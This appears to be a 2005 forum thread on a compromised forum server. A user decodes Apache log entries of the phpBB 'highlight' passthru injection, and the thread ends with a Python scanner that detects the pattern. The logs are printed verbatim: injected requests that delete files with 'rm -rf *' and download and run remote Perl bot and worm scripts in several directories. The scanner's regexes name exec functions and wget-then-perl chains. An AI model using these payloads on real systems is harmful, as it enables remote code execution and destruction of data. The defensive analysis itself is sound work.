sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 
65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527

GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/pr
oxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
is
GET /showthread.php?t=8240&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 
65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527

GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
is
GET /printthread.php?t=440&rush=echo _START_; cd /tmp; wget security.cnc.net/bot.txt;wget security.cnc.net/worm.txt;perl worm.txt;rm worm.txt;perl bot.txt;rm bot.txt; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527';
If run, it does try to download files into those dirs and run them.
In your case the try on "/usr/local/apache/proxy/" did work, so you got the files in there. Unfortunately none of the URLs above work, so I can't find out what the perl scripts do; my guess is they download more files and do something else.
Someone might have used this script to exploit you:
http://www.k-otik.com/exploits/20041...pbb2010.pl.php

Are you sure it's vBB 3.0.5? It looks like the phpBB highlight exploit code.


Last edited by sehe; 01-12-2005 at 03:26 PM.
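The decoding sehe walks through above can be automated over a whole domlog: the tell-tale is a double-encoded quote (%2527) closing a PHP string in the highlight parameter, followed by passthru($HTTP_GET_VARS[...]) naming the parameter that carries the shell chain. The scanner below is an added example in Python, not code from the thread; its log lines are constructed (RFC 5737 addresses, example.invalid host) and modelled on the entries posted, not copied from them.

```python
"""Scan Apache access-log lines for the command-injection pattern decoded above:
a double-URL-encoded quote (%2527) closing a PHP string in the highlight
parameter, followed by passthru($HTTP_GET_VARS[<name>]) so that a second query
parameter (rush in the thread's logs) is handed to a shell.

Added example for this thread, not code from the posts. SAMPLE_LOG is
constructed (RFC 5737 addresses, example.invalid host), not the real entries."""
import re
from urllib.parse import unquote

# Combined log format, optionally prefixed with "<logfile>:" as grep -H prints it.
# IPv4 only: an IPv6 client address contains ':' and would need a different split.
LOG_RE = re.compile(
    r'^(?:(?P<file>[^:\s]+):)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)')
# Request-supplied string reaching a PHP execution function.
INJECT_RE = re.compile(r"\b(passthru|system|exec|shell_exec)\s*\(|\$HTTP_GET_VARS\[", re.I)
# Name of the parameter the injection dereferences, e.g. $HTTP_GET_VARS[rush].
PARAM_REF_RE = re.compile(r"\$(?:HTTP_GET_VARS|_GET|_REQUEST)\[\s*['\"]?(\w+)")
# Download followed by an interpreter: the fetch-and-run chain from the thread.
FETCH_RUN_RE = re.compile(r"\b(wget|curl|fetch|lynx)\b.*\b(perl|sh|bash|python|chmod)\b", re.S)


def full_decode(s, max_rounds=3):
    """URL-decode until stable: %2527 -> %27 -> ' takes two rounds."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def parse_query(target):
    """Split a request target into path and {param: [fully decoded values]}.
    Split on the raw '&' and '=' first so encoded separators inside values survive."""
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(full_decode(key), []).append(full_decode(value))
    return path, params


def analyse_line(line):
    """Return None for a line without the pattern, else a dict describing the hit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, params = parse_query(m.group("target"))
    hit = next(((k, v) for k, vs in params.items() for v in vs if INJECT_RE.search(v)), None)
    if hit is None:
        return None
    ref = PARAM_REF_RE.search(hit[1])
    cmd_param = ref.group(1) if ref else None
    commands = params.get(cmd_param, [""])[0] if cmd_param else ""
    return {
        "ip": m.group("ip"), "time": m.group("ts"), "path": path,
        "status": int(m.group("status")),
        "injected_via": hit[0], "command_param": cmd_param, "commands": commands,
        "fetch_and_run": bool(FETCH_RUN_RE.search(commands)),
        # _START_/_END_ are the attacker's own delimiters for the command output;
        # a 200 with an oversized body, as in the thread, is where that output went.
        "output_markers": "_START_" in commands and "_END_" in commands,
    }


def scan(lines):
    """Run analyse_line over an iterable of log lines and return the hits in order."""
    return [r for r in (analyse_line(l) for l in lines) if r]


SAMPLE_LOG = [  # constructed, modelled on the thread's entries
    '/usr/local/apache/domlogs/example.invalid:192.0.2.10 - - [01/Jan/2005:21:58:17 +0000] '
    '"GET /showthread.php?t=1&rush=echo%20_START_%3B%20cd%20/tmp;wget%20198.51.100.5/x.txt;'
    'perl%20x.txt%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527'
    ' HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"',
    # same chain with echo/passthru hex-encoded, as in the later entries in the thread
    '192.0.2.11 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=2&rush='
    '%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20203.0.113.7/bot.txt;'
    'perl%20bot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75'
    '%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 2864'
    ' "-" "LWP::Simple/5.79"',
    # benign search that happens to mention wget in the same parameter
    '192.0.2.12 - - [10/Jan/2005:05:00:00 +0000] "GET /showthread.php?t=3&highlight=wget%20mirror'
    ' HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    import sys
    src = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for hit in scan(src):
        print("%(ip)s %(time)s %(path)s via %(injected_via)s -> %(commands)s" % hit)
```

Point it at a domlog (python scan.py /usr/local/apache/domlogs/domain.com) to list every request that carried the pattern, with the decoded shell chain beside it; the decoded value is what to compare against the files found in /usr/local/apache/proxy.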